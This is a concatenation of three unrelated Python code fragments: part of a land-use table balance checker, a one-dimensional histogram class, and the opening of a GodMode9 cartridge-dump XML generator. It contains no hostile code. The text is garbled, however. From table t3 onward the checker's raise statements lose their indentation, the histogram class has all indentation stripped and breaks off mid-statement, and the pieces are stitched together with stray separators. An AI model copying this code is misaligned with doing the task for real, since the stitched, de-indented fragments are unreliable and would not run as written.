r1_t2_bene = c6r1_t2 + c7r1_t2 + c8r1_t2 + c9r1_t2 + c10r1_t2
r2_t2_bene = c6r2_t2 + c7r2_t2 + c8r2_t2 + c9r2_t2 + c10r2_t2
r3_t2_bene = c6r3_t2 + c7r3_t2 + c8r3_t2 + c9r3_t2 + c10r3_t2
r4_t2_bene = c6r4_t2 + c7r4_t2 + c8r4_t2 + c9r4_t2 + c10r4_t2
r5_t2_bene = c6r5_t2 + c7r5_t2 + c8r5_t2 + c9r5_t2 + c10r5_t2
r6_t2_bene = c6r6_t2 + c7r6_t2 + c8r6_t2 + c9r6_t2 + c10r6_t2
c5r1_t2_left = c1r1_t2 + c2r1_t2 + c3r1_t2 + c4r1_t2
c5r2_t2_left = c1r2_t2 + c2r2_t2 + c3r2_t2 + c4r2_t2
c5r3_t2_left = c1r3_t2 + c2r3_t2 + c3r3_t2 + c4r3_t2
c5r4_t2_left = c1r4_t2 + c2r4_t2 + c3r4_t2 + c4r4_t2
c5r5_t2_left = c1r5_t2 + c2r5_t2 + c3r5_t2 + c4r5_t2
c5r6_t2_left = c1r6_t2 + c2r6_t2 + c3r6_t2 + c4r6_t2
c5r1_t2_right = r1_t2_bene + c11r1_t2
c5r2_t2_right = r2_t2_bene + c11r2_t2
c5r3_t2_right = r3_t2_bene + c11r3_t2
c5r4_t2_right = r4_t2_bene + c11r4_t2
c5r5_t2_right = r5_t2_bene + c11r5_t2
c5r6_t2_right = r6_t2_bene + c11r6_t2
# Table 3
r1_t3_bene = c6r1_t3 + c7r1_t3 + c8r1_t3 + c9r1_t3 + c10r1_t3
r2_t3_bene = c6r2_t3 + c7r2_t3 + c8r2_t3 + c9r2_t3 + c10r2_t3
r3_t3_bene = c6r3_t3 + c7r3_t3 + c8r3_t3 + c9r3_t3 + c10r3_t3
r4_t3_bene = c6r4_t3 + c7r4_t3 + c8r4_t3 + c9r4_t3 + c10r4_t3
c5r1_t3_left = c1r1_t3 + c2r1_t3 + c3r1_t3 + c4r1_t3
c5r2_t3_left = c1r2_t3 + c2r2_t3 + c3r2_t3 + c4r2_t3
c5r3_t3_left = c1r3_t3 + c2r3_t3 + c3r3_t3 + c4r3_t3
c5r4_t3_left = c1r4_t3 + c2r4_t3 + c3r4_t3 + c4r4_t3
c5r1_t3_right = r1_t3_bene + c11r1_t3
c5r2_t3_right = r2_t3_bene + c11r2_t3
c5r3_t3_right = r3_t3_bene + c11r3_t3
c5r4_t3_right = r4_t3_bene + c11r4_t3
# Table 4
r1_t4_bene = c6r1_t4 + c7r1_t4 + c8r1_t4 + c9r1_t4 + c10r1_t4
r2_t4_bene = c6r2_t4 + c7r2_t4 + c8r2_t4 + c9r2_t4 + c10r2_t4
r3_t4_bene = c6r3_t4 + c7r3_t4 + c8r3_t4 + c9r3_t4 + c10r3_t4
r4_t4_bene = c6r4_t4 + c7r4_t4 + c8r4_t4 + c9r4_t4 + c10r4_t4
r5_t4_bene = c6r5_t4 + c7r5_t4 + c8r5_t4 + c9r5_t4 + c10r5_t4
c5r1_t4_left = c1r1_t4 + c2r1_t4 + c3r1_t4 + c4r1_t4
c5r2_t4_left = c1r2_t4 + c2r2_t4 + c3r2_t4 + c4r2_t4
c5r3_t4_left = c1r3_t4 + c2r3_t4 + c3r3_t4 + c4r3_t4
c5r4_t4_left = c1r4_t4 + c2r4_t4 + c3r4_t4 + c4r4_t4
c5r5_t4_left = c1r5_t4 + c2r5_t4 + c3r5_t4 + c4r5_t4
c5r1_t4_right = r1_t4_bene + c11r1_t4
c5r2_t4_right = r2_t4_bene + c11r2_t4
c5r3_t4_right = r3_t4_bene + c11r3_t4
c5r4_t4_right = r4_t4_bene + c11r4_t4
c5r5_t4_right = r5_t4_bene + c11r5_t4
# Table 5
r1_t5_bene = c6r1_t5 + c7r1_t5 + c8r1_t5 + c9r1_t5 + c10r1_t5
r2_t5_bene = c6r2_t5 + c7r2_t5 + c8r2_t5 + c9r2_t5 + c10r2_t5
r3_t5_bene = c6r3_t5 + c7r3_t5 + c8r3_t5 + c9r3_t5 + c10r3_t5
r4_t5_bene = c6r4_t5 + c7r4_t5 + c8r4_t5 + c9r4_t5 + c10r4_t5
r5_t5_bene = c6r5_t5 + c7r5_t5 + c8r5_t5 + c9r5_t5 + c10r5_t5
r6_t5_bene = c6r6_t5 + c7r6_t5 + c8r6_t5 + c9r6_t5 + c10r6_t5
c5r1_t5_left = c1r1_t5 + c2r1_t5 + c3r1_t5 + c4r1_t5
c5r2_t5_left = c1r2_t5 + c2r2_t5 + c3r2_t5 + c4r2_t5
c5r3_t5_left = c1r3_t5 + c2r3_t5 + c3r3_t5 + c4r3_t5
c5r4_t5_left = c1r4_t5 + c2r4_t5 + c3r4_t5 + c4r4_t5
c5r5_t5_left = c1r5_t5 + c2r5_t5 + c3r5_t5 + c4r5_t5
c5r6_t5_left = c1r6_t5 + c2r6_t5 + c3r6_t5 + c4r6_t5
c5r1_t5_right = r1_t5_bene + c11r1_t5
c5r2_t5_right = r2_t5_bene + c11r2_t5
c5r3_t5_right = r3_t5_bene + c11r3_t5
c5r4_t5_right = r4_t5_bene + c11r4_t5
c5r5_t5_right = r5_t5_bene + c11r5_t5
c5r6_t5_right = r6_t5_bene + c11r6_t5
# t1
if abs(c5r1_t1_left - c5r1_t1_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('PROTECTED', 'Forest'))
elif abs(c5r2_t1_left - c5r2_t1_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('PROTECTED', 'Shrubland'))
elif abs(c5r3_t1_left - c5r3_t1_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('PROTECTED', 'Natural grasslands'))
elif abs(c5r4_t1_left - c5r4_t1_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('PROTECTED', 'Natural water bodies'))
elif abs(c5r5_t1_left - c5r5_t1_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('PROTECTED', 'Wetlands'))
elif abs(c5r6_t1_left - c5r6_t1_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('PROTECTED', 'Glaciers'))
elif abs(c5r7_t1_left - c5r7_t1_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('PROTECTED', 'Others'))
# t2
elif abs(c5r1_t2_left - c5r1_t2_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('UTILIZED', 'Forest'))
elif abs(c5r2_t2_left - c5r2_t2_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('UTILIZED', 'Shrubland'))
elif abs(c5r3_t2_left - c5r3_t2_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('UTILIZED', 'Natural grasslands'))
elif abs(c5r4_t2_left - c5r4_t2_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('UTILIZED', 'Natural water bodies'))
elif abs(c5r5_t2_left - c5r5_t2_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('UTILIZED', 'Wetlands'))
elif abs(c5r6_t2_left - c5r6_t2_right) > tolerance:
    raise ValueError('The left and right sides do not add up '
                     '({0} table and {1} row)'.format('UTILIZED', 'Others'))
# t3
elif abs(c5r1_t3_left - c5r1_t3_right) > tolerance:
raise ValueError('The left and rigth sides \
do not add up ({0} table \
and {1} row)'.format('MODIFIED', 'Rainfed crops'))
elif abs(c5r2_t3_left - c5r2_t3_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MODIFIED',
'Forest plantations'))
elif abs(c5r3_t3_left - c5r3_t3_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MODIFIED', 'Settlements'))
elif abs(c5r4_t3_left - c5r4_t3_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MODIFIED', 'Others'))
# t4
elif abs(c5r1_t4_left - c5r1_t4_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Irrigated crops'))
elif abs(c5r2_t4_left - c5r2_t4_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Managed water bodies'))
elif abs(c5r3_t4_left - c5r3_t4_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Residential'))
elif abs(c5r4_t4_left - c5r4_t4_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Industry'))
elif abs(c5r5_t4_left - c5r5_t4_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED CONVENTIONAL',
'Others'))
# t5
elif abs(c5r1_t5_left - c5r1_t5_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Indoor domestic'))
elif abs(c5r2_t5_left - c5r2_t5_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Indoor industrial'))
elif abs(c5r3_t5_left - c5r3_t5_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Greenhouses'))
elif abs(c5r4_t5_left - c5r4_t5_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Livestock and husbandry'))
elif abs(c5r5_t5_left - c5r5_t5_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
and {1} row)'.format('MANAGED NON_CONVENTIONAL',
'Power and energy'))
elif abs(c5r6_t5_left - c5r6_t5_right) > tolerance:
raise ValueError('The left and right sides \
do not add up ({0} table \
| |
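The long `elif` chain above repeats the same tolerance check for every table/row pair. A minimal data-driven sketch of the same logic (the `validate` helper, the sample labels, and the placeholder left/right numbers below are illustrative, not part of the original script):

```python
# Sketch: collapse repeated tolerance checks into a table of
# (table_name, row_name, left_value, right_value) entries.
tolerance = 0.01

checks = [
    ('PROTECTED', 'Wetlands', 10.0, 10.0),
    ('UTILIZED', 'Forest', 5.0, 5.0),
    ('MODIFIED', 'Rainfed crops', 3.0, 3.2),  # deliberately mismatched
]

def validate(checks, tolerance):
    # Raise on the first pair whose sides differ by more than the tolerance,
    # mirroring the behaviour of the original elif chain.
    for table, row, left, right in checks:
        if abs(left - right) > tolerance:
            raise ValueError('The left and right sides do not add up '
                             '({0} table and {1} row)'.format(table, row))

try:
    validate(checks, tolerance)
except ValueError as exc:
    print(exc)
```

Like the chain, this reports only the first failing pair; collecting all failures before raising would be a one-line change.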
"""One-dimensional histograms."""
from typing import Optional, Tuple
import numpy as np
from . import bin_utils
from .histogram_base import HistogramBase
from .binnings import BinningBase
# TODO: Fix I/O with binning
class Histogram1D(HistogramBase):
"""One-dimensional histogram data.
The bins can be of different widths.
The bins need not be consecutive. However, some functionality may not be available
for non-consecutive bins (like keeping information about underflow and overflow).
Attributes
----------
_stats : dict
These are the basic attributes that can be used in the constructor (see there)
Other attributes are dynamic.
"""
def __init__(self, binning, frequencies=None, errors2=None, *, stats=None, **kwargs):
"""Constructor
Parameters
----------
binning: physt.binnings.BinningBase or array_like
The binning
frequencies: Optional[array_like]
The bin contents.
keep_missed: Optional[bool]
Whether to keep track of underflow/overflow when filling with new values.
underflow: Optional[float]
Weight of observations that were smaller than the minimum bin.
overflow: Optional[float]
Weight of observations that were larger than the maximum bin.
name: Optional[str]
Name of the histogram (will be displayed as plot title)
axis_name: Optional[str]
Name of the characteristics that is histogrammed (will be displayed on x axis)
errors2: Optional[array_like]
Quadratic errors of individual bins. If not set, defaults to frequencies.
stats: dict
Dictionary of various statistics ("sum", "sum2")
"""
missed = [
kwargs.pop("underflow", 0),
kwargs.pop("overflow", 0),
kwargs.pop("inner_missed", 0)
]
if "axis_name" in kwargs:
kwargs["axis_names"] = [kwargs.pop("axis_name")]
HistogramBase.__init__(self, [binning], frequencies, errors2, **kwargs)
if frequencies is None:
self._stats = Histogram1D.EMPTY_STATS.copy()
else:
self._stats = stats
if self.keep_missed:
self._missed = np.array(missed, dtype=self.dtype)
else:
self._missed = np.zeros(3, dtype=self.dtype)
EMPTY_STATS = {"sum": 0.0, "sum2": 0.0}
@property
def axis_name(self) -> str:
return self.axis_names[0]
@axis_name.setter
def axis_name(self, value: str):
self.axis_names = (value,)
def select(self, axis, index, force_copy: bool = False):
"""Alias for [] to be compatible with HistogramND."""
if axis == 0:
if index == slice(None) and not force_copy:
return self
return self[index]
else:
raise ValueError("In Histogram1D.select(), axis must be 0.")
def __getitem__(self, i):
"""Select sub-histogram or get one bin.
Parameters
----------
i : int or slice or bool masked array or array with indices
In most cases, this has same semantics as for numpy.ndarray.__getitem__
Returns
-------
Histogram1D or tuple
Depending on the parameters, a sub-histogram or content of one bin are returned.
"""
underflow = np.nan
overflow = np.nan
keep_missed = False
if isinstance(i, int):
return self.bins[i], self.frequencies[i]
elif isinstance(i, np.ndarray):
if i.dtype == bool:
if i.shape != (self.bin_count,):
raise IndexError("Cannot index with masked array of a wrong dimension")
elif isinstance(i, slice):
keep_missed = self.keep_missed
# TODO: Fix this
if i.step is not None and i.step != 1:
raise IndexError("Cannot change the order of bins")
if i.step == 1 or i.step is None:
underflow = self.underflow
overflow = self.overflow
if i.start:
underflow += self.frequencies[0:i.start].sum()
if i.stop:
overflow += self.frequencies[i.stop:].sum()
# Masked arrays or item list or ...
return self.__class__(self._binning.as_static(copy=False)[i], self.frequencies[i],
self.errors2[i], overflow=overflow, keep_missed=keep_missed,
underflow=underflow, dtype=self.dtype,
name=self.name, axis_name=self.axis_name)
@property
def _binning(self) -> BinningBase:
"""Adapter property for HistogramBase interface"""
return self._binnings[0]
@_binning.setter
def _binning(self, value: BinningBase):
self._binnings = [value]
@property
def binning(self) -> BinningBase:
"""The binning.
Note: Please, do not try to update the object itself.
"""
return self._binning
@property
def bins(self) -> np.ndarray:
"""Array of all bin edges.
Returns
-------
Wide-format [[leftedge1, rightedge1], ... [leftedgeN, rightedgeN]]
"""
# TODO: Read-only copy
return self._binning.bins # TODO: or this should be read-only copy?
@property
def numpy_bins(self) -> np.ndarray:
"""Bins in the format of numpy.
"""
# TODO: If not consecutive, does not make sense
# TODO: Deprecate
return self._binning.numpy_bins
@property
def edges(self) -> np.ndarray:
return self.numpy_bins
@property
def numpy_like(self) -> Tuple[np.ndarray, np.ndarray]:
"""Same result as would the numpy.histogram function return."""
return self.frequencies, self.numpy_bins
@property
def cumulative_frequencies(self) -> np.ndarray:
"""Cumulative frequencies.
Note: underflow values are not considered
"""
return self._frequencies.cumsum()
@property
def underflow(self):
if not self.keep_missed:
return np.nan
return self._missed[0]
@underflow.setter
def underflow(self, value):
self._missed[0] = value
@property
def overflow(self):
if not self.keep_missed:
return np.nan
return self._missed[1]
@overflow.setter
def overflow(self, value):
self._missed[1] = value
@property
def inner_missed(self):
if not self.keep_missed:
return np.nan
return self._missed[2]
@inner_missed.setter
def inner_missed(self, value):
self._missed[2] = value
def mean(self) -> Optional[float]:
"""Statistical mean of all values entered into histogram.
This number is precise, because we keep the necessary data
separate from bin contents.
"""
if self._stats: # TODO: should be true always?
if self.total > 0:
return self._stats["sum"] / self.total
else:
return np.nan
else:
return None # TODO: or error
def std(self) -> Optional[float]: #, ddof=0):
"""Standard deviation of all values entered into histogram.
This number is precise, because we keep the necessary data
separate from bin contents.
Returns
-------
float
"""
# TODO: Add DOF
if self._stats:
return np.sqrt(self.variance())
else:
return None # TODO: or error
def variance(self) -> Optional[float]: #, ddof: int = 0) -> float:
"""Statistical variance of all values entered into histogram.
This number is precise, because we keep the necessary data
separate from bin contents.
Returns
-------
float
"""
# TODO: Add DOF
# http://stats.stackexchange.com/questions/6534/how-do-i-calculate-a-weighted-standard-deviation-in-excel
if self._stats:
if self.total > 0:
return (self._stats["sum2"] - self._stats["sum"] ** 2 / self.total) / self.total
else:
return np.nan
else:
return None
# TODO: Add (correct) implementation of SEM
# def sem(self):
# if self._stats:
# return 1 / total * np.sqrt(self.variance)
# else:
# return None
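The `mean()` and `variance()` methods above rely only on the running accumulators stored in `_stats` ("sum" and "sum2") plus the total weight, so they stay exact no matter how coarse the binning is. A standalone check of the variance formula they use (illustrative values, not part of the class):

```python
import numpy as np

values = np.array([1.0, 2.0, 2.0, 5.0])

# The histogram only needs these two accumulators (plus the total weight):
s1 = values.sum()          # corresponds to _stats["sum"]
s2 = (values ** 2).sum()   # corresponds to _stats["sum2"]
total = len(values)

mean = s1 / total
# Same formula as Histogram1D.variance(): E[x^2] - E[x]^2, rearranged.
variance = (s2 - s1 ** 2 / total) / total

print(mean, variance)  # -> 2.5 2.25, identical to np.mean / np.var
```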
@property
def bin_left_edges(self):
"""Left edges of all bins.
Returns
-------
numpy.ndarray
"""
return self.bins[..., 0]
@property
def bin_right_edges(self):
"""Right edges of all bins.
Returns
-------
numpy.ndarray
"""
return self.bins[..., 1]
@property
def min_edge(self):
"""Left edge of the first bin.
Returns
-------
float
"""
return self.bin_left_edges[0]
@property
def max_edge(self):
"""Right edge of the last bin.
Returns
-------
float
"""
return self.bin_right_edges[-1]
@property
def bin_centers(self):
"""Centers of all bins.
Returns
-------
numpy.ndarray
"""
return (self.bin_left_edges + self.bin_right_edges) / 2
@property
def bin_widths(self):
"""Widths of all bins.
Returns
-------
numpy.ndarray
"""
return self.bin_right_edges - self.bin_left_edges
@property
def total_width(self):
"""Total width of all bins.
In non-consecutive histograms, the missing intervals are not counted in.
Returns
-------
float
"""
return self.bin_widths.sum()
@property
def bin_sizes(self):
return self.bin_widths
def find_bin(self, value):
"""Index of bin corresponding to a value.
Parameters
----------
value: float
Value to be searched for.
Returns
-------
int
index of bin to which value belongs
(-1=underflow, N=overflow, None=not found - non-consecutive)
"""
ixbin = np.searchsorted(self.bin_left_edges, value, side="right")
if ixbin == 0:
return -1
elif ixbin == self.bin_count:
if value <= self.bin_right_edges[-1]:
return ixbin - 1
else:
return self.bin_count
elif value < self.bin_right_edges[ixbin - 1]:
return ixbin - 1
else:
return None
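The lookup in `find_bin` hinges on `np.searchsorted` over the left edges, with the right edges used to distinguish a hit from a gap or overflow. A self-contained sketch of that logic, detached from the class (edge arrays are made-up sample bins):

```python
import numpy as np

# Three consecutive bins: [0, 1), [1, 2), [2, 3]
left_edges = np.array([0.0, 1.0, 2.0])
right_edges = np.array([1.0, 2.0, 3.0])

def find_bin(value):
    # Index of the first left edge strictly greater than value.
    ixbin = np.searchsorted(left_edges, value, side="right")
    if ixbin == 0:
        return -1                                   # underflow
    if ixbin == len(left_edges):
        # The last bin is closed on the right; beyond it is overflow.
        return ixbin - 1 if value <= right_edges[-1] else len(left_edges)
    if value < right_edges[ixbin - 1]:
        return ixbin - 1                            # inside bin ixbin-1
    return None                                     # gap (non-consecutive bins)

print(find_bin(0.5), find_bin(-1.0), find_bin(3.0), find_bin(4.0))  # 0 -1 2 3
```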
def fill(self, value, weight=1):
"""Update histogram with a new value.
Parameters
----------
value: float
Value to be added.
weight: float, optional
Weight assigned to the value.
Returns
-------
int
index of bin which was incremented (-1=underflow, N=overflow, None=not found)
Note: If a gap in non-consecutive bins is matched, underflow & overflow are not valid anymore.
Note: Name was selected because of the eponymous method in ROOT
"""
self._coerce_dtype(type(weight))
if self._binning.is_adaptive():
map = self._binning.force_bin_existence(value)
self._reshape_data(self._binning.bin_count, map)
ixbin = self.find_bin(value)
if ixbin is None:
self.overflow = np.nan
self.underflow = np.nan
elif ixbin == -1 and self.keep_missed:
self.underflow += weight
elif ixbin == self.bin_count and self.keep_missed:
self.overflow += weight
else:
self._frequencies[ixbin] += weight
self._errors2[ixbin] += weight ** 2
if self._stats:
self._stats["sum"] += weight * value
self._stats["sum2"] += weight * value ** 2
return ixbin
def fill_n(self, values, weights=None, dropna: bool = True):
"""Update histograms with a set of values.
Parameters
----------
values: array_like
weights: Optional[array_like]
dropna: Optional[bool]
If true (default), all nan's are skipped.
"""
# TODO: Unify with HistogramBase
values = np.asarray(values)
if dropna:
values = values[~np.isnan(values)]
if self._binning.is_adaptive():
map = self._binning.force_bin_existence(values)
self._reshape_data(self._binning.bin_count, map)
if weights is not None:
weights = np.asarray(weights)
self._coerce_dtype(weights.dtype)
(frequencies, errors2, underflow, overflow, stats) = \
calculate_frequencies(values, self._binning, dtype=self.dtype,
weights=weights, validate_bins=False)
self._frequencies += frequencies
self._errors2 += errors2
# TODO: check that adaptive does not produce under-/over-flows?
if self.keep_missed:
self.underflow += underflow
self.overflow += overflow
if self._stats:
for key in self._stats:
self._stats[key] += stats.get(key, 0.0)
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
# TODO: Change to something in binning itself
if not | |
#!/usr/bin/env python3
"""
* xml_dataset_generator_gm9.py
*
* Copyright (c) 2022, DarkMatterCore <<EMAIL>>.
*
* Permission to use, copy, modify, and/or distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
from __future__ import print_function
import os
import sys
import re
import base64
import subprocess
import traceback
from datetime import datetime
from argparse import ArgumentParser
from typing import List, Union, Tuple, Dict, Pattern, TYPE_CHECKING
SCRIPT_NAME: str = os.path.basename(sys.argv[0])
INITIAL_DIR: str = os.path.abspath(os.path.dirname(__file__))
HASHES_PATH: str = os.path.join('.', 'hashes')
OUTPUT_PATH: str = os.path.join('.', 'out')
PROPERTIES_COUNT: int = 6
XML_HEADER: str = '<?xml version="1.0" encoding="utf-8"?>\n'
XML_HEADER += '<!DOCTYPE datafile PUBLIC "http://www.logiqx.com/Dats/datafile.dtd" "-//Logiqx//DTD ROM Management Datafile//EN">\n'
XML_HEADER += '<datafile>\n'
XML_HEADER += ' <header>\n'
XML_HEADER += ' </header>\n'
XML_FOOTER: str = '</datafile>\n'
HTML_LINE_BREAK: str = '&#xA;'
DEFAULT_COMMENT2: str = ''
GIT_BRANCH: str = ''
GIT_COMMIT: str = ''
GIT_REV: str = ''
GM9_PRODUCT_CODE_REGEX: Pattern[str] = re.compile(r"Product\s+Code\s*:\s*(.+)", flags=re.IGNORECASE)
GM9_CART_ID_REGEX: Pattern[str] = re.compile(r"Cart\s+ID\s*:\s*(.+)", flags=re.IGNORECASE)
GM9_PLATFORM_REGEX: Pattern[str] = re.compile(r"Platform\s*:\s*(.+)", flags=re.IGNORECASE)
GM9_SAVE_CHIP_ID_REGEX: Pattern[str] = re.compile(r"Save\s+chip\s+ID\s*:\s*(?:0x)?(.+)", flags=re.IGNORECASE)
GM9_TIMESTAMP_REGEX: Pattern[str] = re.compile(r"Timestamp\s*:\s*(\d{4}-\d{2}-\d{2}\s+\d{2}:\d{2}:\d{2})", flags=re.IGNORECASE)
GM9_VERSION_REGEX: Pattern[str] = re.compile(r"GM9\s+Version\s*:\s*(.+)", flags=re.IGNORECASE)
WHITESPACE_REGEX: Pattern[str] = re.compile(r"\s+")
ROM_PROPERTIES: Dict = {
'ds': [ 'nds', 'Decrypted' ],
'dsi enhanced': [ 'nds', 'Decrypted' ],
'dsi exclusive': [ 'dsi', 'Decrypted' ],
'o3ds': [ '3ds', 'Encrypted' ],
'n3ds': [ '3ds', 'Encrypted' ]
}
DEFAULT_EARLIEST_DATE: datetime = datetime.strptime('2021-03-22', '%Y-%m-%d')
MEDIA_PICTURE_TYPES: List = [
'back',
'front'
]
MEDIA_PICTURE_EXTENSIONS: List = [
'png',
'jpg',
'jpeg',
'bmp'
]
HASH_FILE_NAME: str = 'HASHES.txt'
HASH_ENTRY_FILE_NAME_REGEX: Pattern[str] = re.compile(r"^File:\s*(.+)", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_FILE_SIZE_REGEX: Pattern[str] = re.compile(r"^Size\s*\(Bytes\):\s*(\d+)", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_CRC32_REGEX: Pattern[str] = re.compile(r"^CRC32:\s*([\da-f]{8})", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_MD5_REGEX: Pattern[str] = re.compile(r"^MD5:\s*([\da-f]{32})", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_SHA1_REGEX: Pattern[str] = re.compile(r"^SHA1:\s*([\da-f]{40})", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_SHA256_REGEX: Pattern[str] = re.compile(r"^SHA256:\s*([\da-f]{64})", flags=(re.MULTILINE | re.IGNORECASE))
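The `re.MULTILINE` flag on the hash-entry regexes lets `^` anchor each field to the start of its own line within a multi-line entry block. A quick exercise of two of those patterns on a made-up `HASHES.txt` fragment (the file name and CRC32 below are invented for illustration):

```python
import re

# Same patterns as above, reproduced here so the sketch is self-contained.
HASH_ENTRY_FILE_NAME_REGEX = re.compile(r"^File:\s*(.+)", flags=(re.MULTILINE | re.IGNORECASE))
HASH_ENTRY_CRC32_REGEX = re.compile(r"^CRC32:\s*([\da-f]{8})", flags=(re.MULTILINE | re.IGNORECASE))

sample_entry = (
    "File: example_game.3ds\n"
    "Size (Bytes): 1073741824\n"
    "CRC32: deadbeef\n"
)

filename = HASH_ENTRY_FILE_NAME_REGEX.search(sample_entry).group(1).strip()
crc32 = HASH_ENTRY_CRC32_REGEX.search(sample_entry).group(1).strip()
print(filename, crc32)  # -> example_game.3ds deadbeef
```

Without `re.MULTILINE`, only a field on the very first line of the entry would match.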
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def utilsGetPath(path_arg: str, fallback_path: str, is_file: bool, create: bool = False) -> str:
path = os.path.abspath(os.path.expanduser(os.path.expandvars(path_arg if path_arg else fallback_path)))
if not is_file and create: os.makedirs(path, exist_ok=True)
if not os.path.exists(path) or (is_file and os.path.isdir(path)) or (not is_file and os.path.isfile(path)):
raise Exception("Error: '%s' points to an invalid file/directory." % (path))
return path
def utilsRunGit(args: List[str]) -> subprocess.CompletedProcess:
return subprocess.run(['git'] + args, capture_output=True, encoding='utf-8')
def utilsGetGitInfo() -> None:
global DEFAULT_COMMENT2, GIT_BRANCH, GIT_COMMIT, GIT_REV
# Get git branch.
proc = utilsRunGit(['rev-parse', '--abbrev-ref', 'HEAD'])
if not proc.stdout or proc.returncode != 0: raise Exception('Failed to run git!')
GIT_BRANCH = proc.stdout.strip()
# Get git commit.
proc = utilsRunGit(['rev-parse', '--short', 'HEAD'])
if not proc.stdout or proc.returncode != 0: raise Exception('Failed to run git!')
GIT_COMMIT = proc.stdout.strip()
# Generate git revision string.
GIT_REV = GIT_BRANCH + '-' + GIT_COMMIT
proc = utilsRunGit(['status', '--porcelain'])
if proc.returncode != 0: raise Exception('Failed to run git!')
proc = proc.stdout.strip()
if proc: GIT_REV += '-dirty'
# Update default comment2 string.
comment2_str = DEFAULT_COMMENT2
DEFAULT_COMMENT2 = '[%s revision %s used to generate XML files]' % (SCRIPT_NAME, GIT_REV)
if comment2_str: DEFAULT_COMMENT2 += '%s%s' % (HTML_LINE_BREAK, comment2_str)
def utilsGetRegexResult(cur_value: str, regex: Pattern[str], search_str: str) -> str:
if not cur_value:
cur_value = re.search(regex, search_str)
if cur_value: cur_value = cur_value.group(1).strip()
return cur_value
def utilsGetBase64EncodedMediaPictures(indir: str, basename: str) -> Dict:
# Empty dictionary to hold the Base64-encoded media pictures.
media_pictures = {}
# Loop through all possible media picture combinations.
for media_picture_type in MEDIA_PICTURE_TYPES:
for media_picture_ext in MEDIA_PICTURE_EXTENSIONS:
# Generate path. Skip entry if the file doesn't exist or if it's empty.
media_path = os.path.join(indir, basename + '_' + media_picture_type + '.' + media_picture_ext)
if (not os.path.exists(media_path)) or os.path.isdir(media_path) or (not os.path.getsize(media_path)): continue
# Read whole file into memory.
with open(media_path, 'rb') as media_fd: media_data = media_fd.read()
# Convert media picture data into a Base64-encoded string.
media_data = base64.b64encode(media_data).decode('utf-8')
# Update dictionary.
media_pictures.update({ media_picture_type: media_data })
break
return media_pictures
def utilsBuildGM9Cache(indir: str) -> Dict:
# Empty dictionary, used to hold the GodMode9 cache.
gm9_cache = {}
# Get current date.
now = datetime.utcnow()
# Scan GodMode9 dump directory.
dir_scan = os.scandir(indir)
# Parse available TXT files.
for entry in dir_scan:
# Skip files without a TXT extension.
if (not entry.is_file()) or (not entry.name.lower().endswith('.txt')) or (entry.name.lower() == 'hashes.txt'): continue
# Initialize variables.
filename: str = os.path.splitext(entry.name)[0]
product_code: str = ''
cart_id: str = ''
platform: str = ''
save_chip_id: str = ''
timestamp: str = ''
gm9_version: str = ''
extension: str = ''
crypto: str = ''
# Parse TXT file.
with open(entry.path, 'r') as txt:
for idx, line in enumerate(txt):
# Strip current line.
cur_line = line.strip()
